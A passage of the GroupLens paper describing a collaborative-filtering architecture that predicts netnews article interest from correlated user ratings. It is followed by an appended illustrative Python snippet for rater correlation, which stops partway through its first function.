   that mass mailings have a low production cost per addressee and should
   therefore be given lower priority. Applying this idea to netnews, a
   news client might filter out articles that had been cross-posted to
   several newsgroups. More radical schemes could provide payments (in
   real money or reputation points) to readers to consider articles and
   payments to producers based on how much the readers liked the
   articles.
   
   Stodolsky has proposed a scheme that combines social and economic
   filtering techniques [19]. He proposes on-line publications where the
   publication decision ultimately rests with the author. During a
   preliminary publication period, other readers may post ratings of the
   article. The author may then withdraw the article, to avoid the cost
   to his reputation of publishing an article that is disliked.
   
   Outline
   
   The GROUPLENS section of the paper describes the GroupLens
   architecture and its evolution. The ONGOING EXPERIMENTATION section
   describes a larger scale test of the architecture that is in
   preparation. The SOCIAL IMPLICATIONS section addresses social changes
   in the use of Netnews that may be precipitated by GroupLens.
   
   GROUPLENS
   
   GroupLens is a distributed system for gathering, disseminating, and
   using ratings from some users to predict other users' interest in
   articles. It includes news reading clients for both Macintosh and Unix
   computers, as well as "Better Bit Bureaus," servers that gather
   ratings and make predictions. Both the overall architecture and
   particular components have evolved through iterative design and pilot
   testing to meet the following goals:
   
   Openness: There are currently dozens of news clients in common use,
   each with a strong following among its user community. Any or all of
   these clients can be adapted to participate in GroupLens. GroupLens
   also allows for the creation of alternative Better Bit Bureaus that
   use ratings in different ways to predict user interest in news
   articles.
   
   Ease of Use: Ratings are easy to form and communicate, and predictions
   are easy to recognize and interpret. This minimizes the additional
   burden that collaborative filtering places on users.
   
   Compatibility: The architecture is compatible with existing news
   mechanisms. Compatibility reduces user overhead in taking advantage of
   the new tool, and simplifies its introduction into netnews.
   
   Scalability: As the number of users grows, the quality of predictions
   should improve and the speed not deteriorate. One potential limit to
   growth will be transport and storage of the ratings, if GroupLens
   grows very large.
   
   Privacy: Some users would prefer not to have others know what kinds of
   articles they read and what kinds they like. The Better Bit Bureaus in
   GroupLens can make effective use of ratings even if they are provided
   under a pseudonym.
   
   Overview
   
   Usenet consists of Internet sites as well as UUCP sites. Typically a
   site will declare a machine to act as its news server. Users at each
   site invoke news clients on their computers and connect to the news
   server in order to retrieve news articles. Users can also write new
   articles and post them to the news server through their news clients.
   
   When a user posts an article, it travels from the news client where
   the article is composed to the local news server and from there to
   news servers at nearby sites. After leaving the originating site, an
   article propagates throughout Usenet, hopping from site to site. Since
   there is no centralized coordination of the distribution process, an
   article may arrive at a site via more than one route. Because articles
   have globally unique identifiers, however, and are never altered once
   they are posted, any site can recognize a duplicate copy of an article
   and avoid passing it on. Lotus Notes uses a similar distribution
   process [10]. The netnews architecture is summarized in Figure 1.
   
   GroupLens adds one new type of entity to the netnews architecture,
   Better Bit Bureaus, as shown in Figure 2. The Better Bit Bureaus
   provide scores that predict how much the user will like articles, and
   gather ratings from news clients after the user reads the articles.
   The Better Bit Bureaus also use special newsgroups to share ratings
   with each other, to allow collaborative filtering among users at
   different sites. The remainder of this section traces the processes of
   rating creation, distribution, and use and describes how they meet
   the design goals of openness, ease of use, compatibility, scalability,
   and privacy.
   
   [IMAGE]
   
   Figure 1: The netnews architecture. News articles hop from news server
   to news server. A news client connects to the news server at its site
   and presents articles to users.
   
   [INLINE]
   
   Figure 2: The GroupLens architecture. Better Bit Bureaus collect
   ratings from clients, communicate them by way of news servers, and use
   them to generate numeric score predictions that they send to clients.
   Clients connect to a local news server, and can connect to a Better
   Bit Bureau that uses the same or a different news server.
   
   Entering Ratings
   
   In GroupLens, a rating is a number from 1 to 5, optionally
   supplemented by the number of seconds which the user spent reading the
   article. Users are encouraged to assign ratings based on how much they
   liked the article, with 5 highest and 1 lowest. The user chooses a
   pseudonym to associate with her ratings that may be different from the
   name she uses for posting news articles. This preserves the ability to
   detect that two ratings came from the same person, while preventing
   detection of exactly who that person is.
   
   The GroupLens choice of the form and meaning of ratings is only one
   possibility in a rich design space. There are many possible dimensions
   along which to rate articles: interest in subject, quality of writing,
   authoritativeness of the author, etc. Rather than a single composite
   rating, separate ratings on several dimensions could be solicited from
   readers. Free text ratings could be entered rather than numbers.
   Readers could be asked to predict how well they think other readers
   will like an article rather than report how much they themselves liked
   it. Ratings could be restricted only to positive, or only to negative
   evaluations. The degree of privacy could also be varied, from
   completely anonymous to authenticated signatures.
   
   In fact, an earlier implementation of a Macintosh news client [20]
   employed ratings with quite a different form than the current
   GroupLens architecture. Users entered only endorsements, positive
   ratings, on the assumption that since the signal to noise ratio in
   netnews is so low it is only important to point out the good articles.
   Readers endorsed articles that they thought others in a known small
   group would like. Finally, readers signed endorsements with their real
   names, allowing other people to select all the articles endorsed by a
   particular friend.
   
   A pilot test of that earlier endorsement mechanism at a Schlumberger
   research lab indicated that a group of seven people may not be large
   enough to get the full available benefit of collaborative filtering.
   As we contemplated a much larger group size, we believed that some
   users would be less willing to sign their ratings and that it would
   become increasingly difficult for users to know what articles others
   in the group would like.
   
   The pilot test also reinforced the importance of making it as easy as
   possible to enter endorsements. To make an endorsement, a user had to
   select from a pull-down menu, wait for a window to open up, optionally
   enter text in the window, and then close it. While the whole process
   took only a matter of seconds if the user entered no text, it was
   still significantly longer than it normally takes to go on to the next
   article.
   
   We have taken care in the GroupLens system to make entry of ratings as
   easy as possible. We have modified three news clients, Emacs Gnus and
   NN for UNIX machines and NewsWatcher for Macintoshes. In each case,
   entry of a rating fits into the overall paradigm of the news client.
   For example, in the modified NewsWatcher, the numbers 1 to 5 appear as
   selectable buttons any time a user reads an article (Figure 3), and
   the user can also type a number as a keyboard shortcut for those
   buttons. In Gnus, no buttons are displayed, but readers still type the
   ratings directly. With NN, readers first type the letter `v' (to enter
   into "rating mode") and then the rating.
   
   [IMAGE]
   
   Figure 3. Reading an article with the modified NewsWatcher client. The
   user can click on one of the five ratings buttons with the mouse, or
   type a number from 1 to 5 on the keyboard.
   
   The GroupLens architecture requires only that ratings be reported on a
   1 to 5 scale, not that they be displayed by news clients on that
   scale. To make the rating scale easy for students to understand, the
   NN and Gnus clients accept letter grades rather than numbers. When
   reporting the ratings to the Better Bit Bureau, they translate `a' to
   5, `b' to 4 and so on. Other news clients could allow more gradations
   of ratings (e.g., 1 to 100) and report them as fractions between 1 and
   5.
   
   Distributing Ratings
   
   GroupLens does not interfere with the Usenet propagation scheme at
   all. On the contrary, it relies upon it heavily. The Better Bit Bureau
   packages one or more ratings into a news article, following the format
   in Figure 4, and posts it to a news server. This allows GroupLens to
   take advantage of the Usenet propagation scheme. Over the years Usenet
   has demonstrated its ability to propagate articles to every other
   Usenet site, even as the number of news servers has grown
   dramatically. Rating servers could exchange ratings directly, through
   internet or UUCP links, but they would have to reimplement many of the
   propagation features already found in Usenet.
   
   The message format we have defined allows several ratings to be
   batched in a single article. Each rating is just one line of text,
   while each Usenet netnews article requires several lines of headers.
   Thus, packaging several ratings in one article can save a considerable
   amount of overhead. Our Better Bit Bureaus (BBBs) batch at the session
   level (i.e., all ratings entered by a user during a reading session go
   into one ratings article). Other batching policies, such as all
   ratings from a site over the last hour, could be implemented.
   
   Ratings are posted in newsgroups dedicated solely to ratings articles.
   One natural configuration is to set up a parallel "ratings transport"
   newsgroup for each "normal" Usenet group. One deficiency of this
   approach is that if a rating article contains several ratings, it may
   have to be cross-posted to many ratings newsgroups. Another deficiency
   is that it requires news servers to carry a large number of new
   newsgroups devoted solely to ratings, which may increase
   administrative overhead. Currently, our BBBs post all ratings in a
   single newsgroup.
   
   To facilitate the initial spread of GroupLens, users can participate
   even if their local news servers do not carry the ratings newsgroup
   and even if their local site administrators have not set up Better Bit
   Bureaus. The GroupLens architecture permits this by allowing users to
   connect to a remote BBB. The left side of Figure 2 illustrates a local
   BBB that posts ratings articles to the same news server that the
   clients connect to. The right side of Figure 2 illustrates a client
   connecting to a remote BBB that propagates ratings articles through a
   different news server.
   
   Predicting Scores 
   
   The Better Bit Bureaus (BBBs) predict how much readers will like
   articles. While content filters would make predictions based on the
   presence or absence of words in the articles, the BBBs in GroupLens
   use the opinions of other people who have already rated the articles.
   If no one has read an article, the BBBs are unable to make predictions
   about it.
   
   When ratings for an article are available, they are unlikely to be
   uniform, due to differences of opinion and goals among the raters. A
   BBB combines the different ratings to produce a predicted score.
   Moreover, additional readers are likely to have different opinions
   about the article. A BBB thus might use the same ratings to predict
   different scores for different readers, by changing the relative
   weight given to the ratings.
   
   When predictions are on the same scale as ratings, prediction can be
   modeled as matrix filling, where the columns are people, the rows are
   articles, and the cells contain the ratings that people have posted,
   as shown in Figure 5. Many of the cells of the matrix are empty,
   because readers have not yet examined those articles or have elected
   not to rate them. A BBB predicts scores for missing cells before the
   readers examine the corresponding articles.
   
   
   
   From: MIT GroupLens Better Bit Bureau
   Subject: Ratings; please ignore
   Message-ID: <771185369@guilder.mit.edu>
   Groups_Rated: news.adin.policy, news.groups
   Raters: [Pseudo1]
   
   <MATT.94May19124319@physics5.berkeley.edu> [Pseudo1] 1 12 news.adin.policy
   <fred_sCq2FF6.Mtt@netcom.com> [Pseudo1] 2 7 news.groups
   
   
   
   Figure 4: A sample ratings article. Each line in the body of the
   article contains a rating of one article by one person. The five
   fields on each line are the id of the article, the pseudonym of the
   rater, a rating, the number of seconds the reader spent examining the
   article before rating it, and the newsgroups the article is in. The
   time count is optional. Additional keyword identified fields can also
   be included at the end of line.
   
   [IMAGE]
   
   Figure 5: a sample matrix of ratings.
   
   All the scoring methods we have implemented are based on the heuristic
   that people who agreed in the past are likely to agree again, at least
   on articles in the same newsgroup. This heuristic will mislead on
   occasion, but preferences for most kinds of articles are likely to be
   fairly stable over time.
   
   To implement this heuristic, our BBBs first correlate ratings on
   previous articles to determine weights to assign to each of the other
   people when making predictions for one of them. Then, they use the
   weights to combine the ratings that are available for the current
   article. We have investigated several techniques for correlating past
   behavior and using the resultant weights, based on reinforcement
   learning [12], multivariate regression, and pairwise correlation
   coefficients that minimize linear error or squared error.
   
   We illustrate one of the correlation and prediction techniques by
   computing Ken's predicted score on article 6, the last row of the
   matrix. First, we compute correlation coefficients [15], weights
   between -1 and 1 that indicate how much Ken tended to agree with each
   of the others on those articles that they both rated. For example,
   Ken's correlation coefficient with Lee is computed as:
   
   [IMAGE]
   
   In the formula above, [INLINE] is the average of Ken's ratings. All
   the summations and averages in the formula are computed only over
   those articles that Ken and Lee both rated. We have conveniently
   arranged for [INLINE] and [INLINE] to be 3 in this example, but that
   need not be true in practice.
   
   Similarly, Ken's correlation coefficient with Meg is +1 and with Nan
   is 0. That is, Ken tends to disagree with Lee ( [INLINE] ) and agree
   with Meg ( [INLINE] ). His ratings are not correlated with Nan's.
   
   To predict Ken's score on the last article in the matrix, take a
   weighted average of all the ratings on article 6 according to the
   following formula:
   
   [IMAGE]
   
   This is a reasonable prediction for Ken, since the article received a
   high rating from someone who agreed with him in the past and a low
   rating from someone who disagreed. Carrying through similar
   calculations for Nan yields a lower prediction of 3.75. Since Nan had
   partial agreement with Lee in the past, Lee's low rating for the
   article partially cancels out the high ratings that Meg gave it.
   
   The score prediction system is robust with respect to certain
   differences of interpretation of the rating scale. If two users are
   perfectly correlated, but one user gives only scores between 3 and 5
   and the other only scores between 1 and 3, a 5 score from the first
   user will result in a prediction of 3 for the second. If two users
   would be perfectly correlated, but the first mistakenly thinks 1 is a
   good score and 5 is bad, the two will be negatively correlated and a 1
   score from the first will result in a prediction of 5 for the second.
   This leads to a clear explanation to the user of how to assign
   ratings: assign the rating you wish GroupLens had predicted for this
   article.
   
   Allen's study of five subjects' preferences for newswire articles [1]
   found very small correlations between subjects, thus calling into
   question our basic assumption that people who agreed in the past are
   likely to agree again. It may be, however, that a larger sample of
   subjects would have yielded some pairs with larger overlaps in their
   ratings. More importantly, it may be that pairs of people will share
   interests in some topics but not others. Two people may agree in their
   evaluations of technical articles, but not jokes. Our BBBs keep
   separate rating matrices for each newsgroup.
   
   One hopes that the accuracy of the predictions improves as the BBB has
   more past ratings to use in computing correlations. Four people at the
   University of Minnesota participated in a pilot test of an earlier
   version, using a slightly different scoring function. While all four
   participants reported that the predicted scores eventually matched
   their interests fairly closely, they did observe that there was a
   start-up interval before the predictions were very useful. Further
   experiments and analysis are necessary to determine just how long the
   start-up interval is likely to be for each new user.
   
   It seems likely that better scoring mechanisms can be developed. In
   addition to better matrix filling techniques, it may be helpful to use
   both others' ratings and the contents of articles in making
   predictions. It may also be helpful to take into account the time
   people spent reading articles before rating them, information
   collected but not used by our BBBs.
   
   Fortunately, the GroupLens architecture is open: anyone can implement
   an alternative BBB so long as it posts ratings articles in the format
   described above and communicates with clients the same way that our
   BBBs do. We hope that the development of alternative BBBs will become
   an active area for future research. As we describe below, our next
   pilot test should yield rating sets that we will make available to
   others who wish to evaluate alternative scoring algorithms.
   
   Using Ratings
   
   It is up to the news client how best to use the scores generated by a
   BBB. Some may filter out those articles with scores below a threshold.
   Some may sort the articles based on the scores. Others may simply
   display the scores, numerically or graphically. In keeping with the
   ease of use design goal, developers should modify each news client in
   a manner consistent with that client's overall design.
   
   One trend in news clients is to display a summary of the unread
   articles in a newsgroup. Each line of the summary contains information
   about one article, typically the author, the subject line and the
   length. A user browses the summary and requests display of the full
   text of those articles that seem interesting. All three of the news
   clients we modified use this display technique.
   
   The three modified clients we implemented make slightly different uses
   of the scores in the summary display. The modified NN client displays
   articles in the same order a regular NN client does, namely the order
   in which the articles arrived at the news server. It merely adds an
   additional column containing the predicted scores. In the first
   version of this client, the scores were displayed numerically.
   
   The modified Gnus client uses the predicted scores to alter the order
   of presentation of articles in the summary. Gnus clusters articles by
   thread. The modified Gnus client sorts the threads based on the
   maximum predicted score over the articles in the thread. Within each
   thread, however, articles are still displayed in chronological order,
   to preserve the flow of discussion. As in the modified NN, the scores
   are displayed in an additional column in the summary.
   
   The Minnesota pilot test included users of both the Gnus and NN
   clients. As expected, participants tended to believe that the sorting
   and display mechanisms of their own news reader were best, but all
   were glad to see the score predictions incorporated into that standard
   format.
   
   Several users, however, noticed that it was somewhat difficult to
   visually scan the predictions to find the high ones. A revised version
   of the NN client (Figure 6) rounds off to the nearest integer and
   reports that as a letter grade (A-E), a scale familiar to students at
   U.S. universities.
   
   The modified NewsWatcher client displays the predicted scores as bar
   graphs rather than numbers (Figure 7), making it easier to visually
   scan for articles with high scores (longer bars). Otherwise, it
   follows the conventions of the original NewsWatcher client. Articles
   are grouped into threads and the summary display initially shows
   header lines only for the first article in each thread. Users can
   twist down the triangle associated with a thread to see the header
   lines for the rest of the articles.
   
   
   
   [IMAGE]
   
   Figure 6: The modified NN client. The third column displays the number
   of lines in the article. The fourth column displays the score
   predictions as letter grades, translated from the numeric predictions
   that the Better Bit Bureau makes (5=A, 4=B, etc.). When no one has
   evaluated an article, no prediction is made.
   
   [IMAGE]
   
   Figure 7: The modified NewsWatcher client displays predicted scores as
   bar graphs. Disclaimer: the scores were randomly generated for
   demonstration purposes. In practice, we would expect articles by Pete
   Bergstrom (one of the authors of this paper) to have much higher
   predicted scores.
   
   Scale Issues
   
   Further research is needed to understand how performance will change
   as the scale increases. In the case of GroupLens, there are several
   relevant performance measures: prediction quality, user time, Better
   Bit Bureau compute time and disk storage, and network traffic.
   
   The first measure is the quality of score predictions. We expect
   prediction quality to increase as the number of users increases, since
   more data will be available to the prediction algorithm.
   
   Another measure is how long users have to wait to post ratings and
   receive predictions. In an earlier version of GroupLens, the functions
   of the BBB were incorporated in the news client itself. One major
   advantage of the separate BBB is that it can pre-fetch ratings and
   pre-compute predictions rather than computing them when the user
   starts the news client. Thus, user time should remain roughly constant
   as GroupLens grows, even if it takes more CPU time to compute scores.
   
   For many possible prediction formulas CPU time will grow even faster
   than linearly with increases in the number of users. To reduce CPU
   time, BBBs could use only a part of the ratings matrix, trading off
   compute time against quality of predictions.
   
   Even though each rating is short, each news article might be read and
   rated by many raters, so the total volume of ratings could exceed the
   volume of news. To minimize storage requirements, BBBs may employ
   algorithms that use and discard ratings as they arrive, rather than
   storing them.
   
   Three basic techniques could reduce network traffic: reduce the size
   of the ratings, reduce the number of ratings, and reduce the number of
   places where each rating is sent. Our BBBs batch several ratings in a
   single article, a first step toward reducing the amount of storage per
   rating, but further compression is possible. The number of ratings
   could be reduced by limiting the total number of ratings per article
   or the number of ratings from users with similar profiles.
   
   The separation of the BBBs from the news clients in the GroupLens
   architecture reduces the number of destinations for each rating: each
   news client receives only score predictions rather than all the
   individual ratings that contribute to those predictions.
   
   The number of destinations for each rating could be further reduced by
   sending ratings to some BBBs but not others. For example, BBBs could
   be clustered, based on geography or interest, and exchange ratings
   only within clusters. The size of each cluster must be small enough to
   limit the amount of ratings information distributed, but large enough
   to provide an effective peer group. The table below estimates daily
   network traffic for various cluster sizes assuming each user rates 100
   articles per day and each rating requires approximately 100 bytes. For
   comparison purposes, the current netnews traffic is around 100MB per
   day.

   Cluster size       Daily ratings traffic
   100 users          1 MB
   10,000 users       100 MB
   1,000,000 users    10 GB
   
   
   Summary of GroupLens Architecture
   
   The heart of GroupLens is an open architecture for distributing
   ratings. The architecture specifies the format of ratings produced in
   batches by BBBs, the propagation of the ratings by Usenet, and the
   interface for delivering predictions and ratings between news clients
   and BBBs. Otherwise, the architecture is completely open. BBBs and
   news clients can be freely substituted, providing an environment for
   experimentation in predicting ratings and in user interfaces for
   collecting ratings and presenting predictions.
   
   ONGOING EXPERIMENTATION 
   
   Both of the previous pilot tests, at Schlumberger and the University
   of Minnesota, involved only local sharing of ratings. These tests led
   to improvements in both the overall architecture and the user
   interfaces of news clients, as discussed already. The next step is a
   larger scale, distributed test, that we plan to carry out this summer.
   We have established a newsgroup on the news servers at MIT and
   Minnesota and two (slightly different) Better Bit Bureaus that
   communicate ratings through that newsgroup.
   
   The test is not designed to demonstrate that people prefer to read
   netnews with our collaborative filters than without them. We believe
   that such an evaluation should wait for at least one more iterative
   design cycle. Rather, the goals are to identify any unexpected scaling
   issues that may arise and to gather a data set that will be useful in
   evaluating alternative score prediction algorithms.
   
   The primary benchmark of any algorithm's effectiveness will be its
   ability to predict values that have been deleted from a rating matrix.
   At first glance, it might seem that any large set of ratings would be
   useful in creating such a benchmark. Upon closer inspection, however,
   complete ratings matrices are much more valuable than sparse ones. For
   example, suppose that users read and rate only a small number of
   articles, based on score predictions they receive from BBB X. If users
   read different articles, this generates a sparse matrix of ratings.
   Now suppose that we wish to compare X to an alternative, Y, that
   predicts different scores for the users. We can compare Y's and X's
   predictions on those articles that users read, but the sample is
   biased. Perhaps with Y's scores, the users would have read other
   articles and liked them.
   
   To allow unbiased comparisons, we are asking each of the participants
   in the next pilot test to read and rate all the articles in a training
   set. The training set will contain a number of articles from each of
   the newsgroups that will be included in the test. Since users will
   contribute ratings under a pseudonym, we will be able to share the
   ratings in this training set with other researchers. In addition, we
   will retain the full texts of the articles in the training set. That
   will enable evaluation of BBBs that perform content filtering, or a
   combination of content filtering and collaborative filtering, as well
   as those that use only other users' ratings.
   
   SOCIAL IMPLICATIONS
   
   Collaborative filtering may introduce many social changes in the
   already rapidly evolving Netnews community. For example, the utility
   of moderated newsgroups may decline. New social patterns will have to
   develop to encourage socially beneficial behaviors, such as reviewing
   articles that have already received a few low ratings. Finally, if
   GroupLens is effective at creating peer groups with shared interests,
   will those peer groups be permeable or will the global village
   fracture into tribes?
   
   Changes to Netnews Behaviors
   
   GroupLens has the potential to change Netnews as we now know it. For
   one thing the quality of articles individual users choose to read
   should increase. More significantly, as more and more users rely on
   GroupLens the total number of low-quality articles on Usenet may
   decrease significantly. Since few people will read such articles, the
   incentive to post them will decrease. GroupLens may also supplant or
   supplement other established Netnews behaviors.
   
   Moderated Newsgroups 
   
   GroupLens may reduce the need for moderated newsgroups. The advantages
   of GroupLens over the existing approach are that "moderators" can be
   groups of people as well as individuals, and that each user can rely
   on a different moderator rather than having a single moderator for the
   entire group.
   
   Some newsgroups might choose to use both a moderator and GroupLens.
   The moderator of a newsgroup will make the initial pass through the
   article submissions. Peer ratings would then allow further filtering.
   
   Newsgroup Splits 
   
   Currently, newsgroups start off with broad topics and split into
   narrower topics as traffic increases. For example, the newsgroup
   rec.sport.football eventually split into the subgroups australian,
   canadian, rugby, pro, college, fantasy, misc, and one for each team in
   the NFL. These splits are a form of content filtering, initiated and
   managed by the users.
   
   GroupLens users may find that many such splits are less important, and
   in some cases undesirable. Over the course of time users will find
   themselves reading only the subset of the newsgroup they are most
   interested in, as they correlate with a peer group with similar
   interests. Splits of interest between groups of users will appear
   naturally, with no additional user or administrative effort. Allowing
   the splits to happen through GroupLens rather than through explicit
   content filtering allows more cross-pollination of general interest
   articles. For instance, interesting articles posted by Bills fans
   about an upcoming football game against the Cowboys would also reach
   Cowboys fans with GroupLens, but would not if the articles were posted
   in the more specialized newsgroup rec.sport.football.bills.
   
   Kill-Files 
   
   Kill files are a content filtering mechanism implemented in some news
   clients. Many users who strongly dislike particular subjects or
   particular authors, however, do not use kill files because they find
   the mechanism complicated and cumbersome. GroupLens might be an easier
   means to the same end. A user's peer group will give such articles low
   ratings, so only a few users will have to read them.
   
   Incentives
   
   Individuals put additional effort, albeit a modest amount, into
   providing ratings through GroupLens. These ratings provide benefit to
   other users who can use them to select interesting articles. It's a
   two-way street: everyone can be both a producer and a consumer of
   ratings.
   
   When someone reads and rates an article, there is an incentive to
   provide honest ratings, because dishonest ratings will cause the BBB
   to make poor future predictions for that user. On the other hand,
   there is no incentive to rate articles at all. On the contrary, there
   is an incentive to wait for others' ratings rather than read and rate
   an article oneself. A certain amount of altruism or guilt may cause
   most people to "do their share" of rating, but fewer than the socially
   optimal number of ratings are likely to be produced.
   
   The four-person Minnesota pilot test included a high-volume newsgroup,
   rec.arts.movies. The volume of articles was so high that each
   participant was unwilling to read a one-quarter share of the total
   daily volume. The newsgroup was quickly dropped from the test. It may
   be that a larger user population would generate ratings even for a
   high-volume list such as rec.arts.movies, but it is harder to draw on
   a "do-your-share" mentality when collaborating with larger groups of
   people.
   
   There are other, more subtle incentive problems that can arise as
   well. For example, there is an asymmetry between the effects of
   positive and negative ratings. If the first few readers rate an
   article too highly, others will read the article and give it lower
   ratings. On the other hand, if the first few ratings of an article are
   negative, others who would have rated it highly may never look at it
   because of the initial negative rating.
   
   To avoid this, it may be necessary to provide external incentives to
   some people to read and rate articles that have initially low ratings.
   The external incentives could be money, fame, or simply access to
   others' ratings: those who did not contribute their share of ratings
   might be denied access to the Better Bit Bureau's predictions.
   
   Global Villages
   
   Present newsgroups, like newspapers and local television shows before
   them, provide a shared history for their community of readers. With
   GroupLens, users may choose to read articles only from a small group
   with whom they share many common interests. Over time this could lead
   to a fracture of the global village into many small tribes, each
   forming a virtual community but nonetheless isolated from each other.
   
   Some kind of fracture is inevitable and even desirable, because no
   user can keep up with the overwhelming volume of news produced each
   day. The question is whether the subgroups will be closed or
   permeable. One argument for prognosticating permeability is that many
   groups will form for a short time and then disband [3]. Another is
   that many users will participate in several subgroups, providing a
   mechanism for the best ideas to cross boundaries of interest groups.
   
   CONCLUSION
   
   Shared evaluations are useful in all sorts of activities. We ask
   friends, colleagues, and professional reviewers for their opinions
   about books, movies, journal articles, cars, schools, and
   neighborhoods. Clearly, some form of shared evaluations should also
   help in filtering electronic information streams such as netnews. It
   is not yet clear exactly what form those evaluations should take, how
   they should be collected and disseminated, and how they should be used
   in selecting articles to read.
   
   GroupLens is one promising approach. A single number gives a composite
   rating of an article on all dimensions relevant to a particular
   reader. We have modified three news reading clients to enable easy
   entry of such numeric ratings. We have also modified the way that the
   clients display subject lines to include predicted scores based on
   others' ratings.
   
   Naturally, there will be differences of opinion among readers about
   particular articles, due to varying interests or quality assessments.
   To accommodate differences of opinion, not all readers will place
   equal trust in particular evaluators. The algorithms we have
   implemented automatically determine how much weight to place on each
   evaluation, based on the degree of correlation between past opinions
   of the reader and evaluator. This has the beneficial side effects that
   readers need not know initially whose evaluations to trust and the
   evaluators' opinions can become trusted even if the evaluators choose
   to remain anonymous.
   
   The GroupLens architecture allows new users to connect and new rating
   servers to come on line, without global coordination. A new user need
   only use a modified news client and have a connection to a rating
   server. The user need not convince the administrator of her netnews
   server to modify the news server, run any additional software, or even
   to carry any additional newsgroups. A new rating server needs only to
   get access to a news server that carries the ratings newsgroups.
   
   Moreover, the architecture is open. Anyone who wishes to can modify a
   news client to allow entry of evaluations or to use predicted scores,
   so long as the client follows the protocol we have established for
   communicating with the rating server. Anyone who wishes to improve on
   the score predictions that our rating servers make can do so. There
   may be better ways to correlate past evaluations. There may also be
   ways to use the evaluations in conjunction with content filtering. For
   example, when correlating past evaluations, the scoring algorithm
   might consider evaluations only of past articles that are somehow
   similar to the current one. Our next pilot test should yield a data
   set that can be used for evaluating alternative prediction methods.
   
   Only further testing can reveal whether GroupLens gathers the right
   kind of evaluations and uses them in ways that people like. If the
   simple numeric evaluations turn out to be sufficient, the architecture
   will scale up to large numbers of rating servers and users. If not,
   then data from our tests will help develop and evaluate other
   mechanisms for sharing and using evaluations.
   
   Right now, people read news articles and react to them, but those
   reactions are wasted. GroupLens is a first step toward mining this
   hidden resource.
   
   ACKNOWLEDGMENTS
   
   Shumpei Kumon's keynote address at CSCW 92 [11] inspired our
   investigation of the practical application of reputations to social
   filtering. Thanks to Lorin Hitt and Carl Feynman for helpful
   discussions about how to predict scores based on past correlations.
   Peter Foltz and Sue Dumais generously provided a test rating set
   generated from one of their experiments on content filtering [5].
   Thanks also to Chris Avery, Joe Adler, Yannis Bakos, Erik
   Brynjolfsson, David Goldberg, Bill MacGregor, Tom Malone, David Maltz,
   Vahid Mashayekhi, Lisa Spears, Doug Terry, Mark Uhrmacher, and
   Zbigniew Wieckowski.
   
   REFERENCES
   
   1. Allen, R.B. User Models: Theory, Method, and Practice.
   International Journal of Man-Machine Studies, 32 (1990), pp.
   511-543.

   2. Belkin, N.J. and Croft, B.W. Information Filtering and Information
   Retrieval: Two Sides of the Same Coin? CACM, 35, 12 (1992), pp. 29-38.

   3. Brothers, L., Hollan, J., Nielsen, J., Stornetta, S., Abney, S.,
   Furnas, G. and Littman, M. Supporting Informal Communication via
   Ephemeral Interest Groups. In Proceedings of CSCW 92 (1992, New York:
   ACM), pp. 84-90.

   4. Deerwester, S., Dumais, S.T., Furnas, G.W., Landauer, T.K. and
   Harshman, R. Indexing by Latent Semantic Analysis. Journal of the
   American Society for Information Science, 41, 6 (1990), pp. 391-407.

   5. Foltz, P.W. and Dumais, S.T. Personalized Information Delivery: An
   Analysis of Information Filtering Methods. Communications of the ACM,
   35, 12 (1992), pp. 51-60.

   6. Goldberg, D., Nichols, D., Oki, B.M. and Terry, D. Using
   Collaborative Filtering to Weave an Information Tapestry.
   Communications of the ACM, 35, 12 (1992), pp. 61-70.

   7. Hill, W.C., Hollan, J.D., Wroblewski, D. and McCandless, T. Edit
   Wear and Read Wear. In Proceedings of CHI 92 Conference on Human
   Factors in Computing Systems (1992, New York: ACM), pp. 3-9.

   8. Kahn, R.E. and Cerf, V.G. The Digital Library Project, Volume 1:
   The World of Knowbots. An Open Architecture for a Digital Library
   System and a Plan for Its Development. CNRI, 1895 Preston White
   Drive, Suite 100, Reston, VA 22091 Tech Report (March, 1988).

   9. Karlgren, J. Newsgroup Clustering Based on User Behavior -- A
   Recommendation Algebra. Swedish Institute of Computer Science
   #SICS-T--94/04-SE (March, 1994).

   10. Kawell, L.J., Beckhardt, S., Halvorsen, T. and Ozzie, R.
   Replicated Document Management in a Group Communication System. In
   Proceedings of CSCW 88 (1988, New York: ACM).

   11. Kumon, S. From Wealth to Wisdom: A Change in the Social Paradigm.
   In Proceedings of CSCW 92 (1992, New York: ACM), pp. 3.

   12. Maes, P. and Kozierok, R. Learning Interface Agents. In
   Proceedings of AAAI 93 (1993, San Mateo, CA: American Association
   for Artificial Intelligence).

   13. Malone, T.W., Grant, K.R., Turbak, F.A., Brobst, S.A. and Cohen,
   M.D. Intelligent Information Sharing Systems. Communications of the
   ACM, 30, 5 (1987), pp. 390-402.

   14. Maltz, D.A. Distributing Information for Collaborative Filtering
   on Usenet Net News. MIT Department of EECS MS Thesis (May, 1994).

   15. Pindyck, R.S. and Rubinfeld, D.L. Econometric Models and Economic
   Forecasts. McGraw-Hill, New York, 1991.

   16. Salton, G. and Buckley, C. Term-Weighting Approaches in Automatic
   Text Retrieval. Information Processing and Management, 24, 5 (1988),
   pp. 513-523.

   17. Salton, G. and Buckley, C. Improving Retrieval Performance by
   Relevance Feedback. Journal of the American Society for Information
   Science, 41, 4 (1990), pp. 288-297.

   18. Sheth, B. A Learning Approach to Personalized Information
   Filtering. MIT Department of EECS MS Thesis (February, 1994).

   19. Stodolsky, D.S. Invitational Journals Based Upon Peer Consensus.
   Roskilde University Centre, Institute of Geography, Socioeconomic
   Analysis, and Computer Science. ISSN 0109-9779-29, No. 29/1990
   (1990).

   20. Suchak, M.A. GoodNews: A Collaborative Filter for Network News.
   MIT Department of EECS MS Thesis (February, 1994).

   21. Wiederhold, G. Mediators in the Architecture of Future Information
   Systems. IEEE Computer, March, (1992), pp. 38-49.
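
The conclusion of the forwarded paper above says that each evaluation is weighted by how well the evaluator's past opinions correlate with the reader's. The following Python example is added here for illustration and is not code from the paper or the GroupLens project; the Pearson-based formula, the `min_overlap` guard and every rating in `RATINGS` are assumptions constructed for this example.

```python
from math import sqrt

# Constructed sample data: ratings on a 1-5 scale, keyed by rater, then article.
RATINGS = {
    "reader": {"a1": 5, "a2": 1, "a3": 4, "a4": 2},
    "ann":    {"a1": 5, "a2": 2, "a3": 4, "a4": 1, "a5": 5},  # tends to agree
    "bob":    {"a1": 1, "a2": 5, "a3": 2, "a4": 4, "a5": 1},  # tends to disagree
    "newbie": {"a1": 5, "a2": 1, "a5": 1},                    # only two shared articles
}


def mean(values):
    values = list(values)
    return sum(values) / len(values)


def pearson(mine, theirs, min_overlap=3):
    """Correlation of two raters over the articles both have rated.

    min_overlap is an assumed guard: with only two shared articles the
    coefficient is always +1 or -1, so such a rater gets no weight by default.
    """
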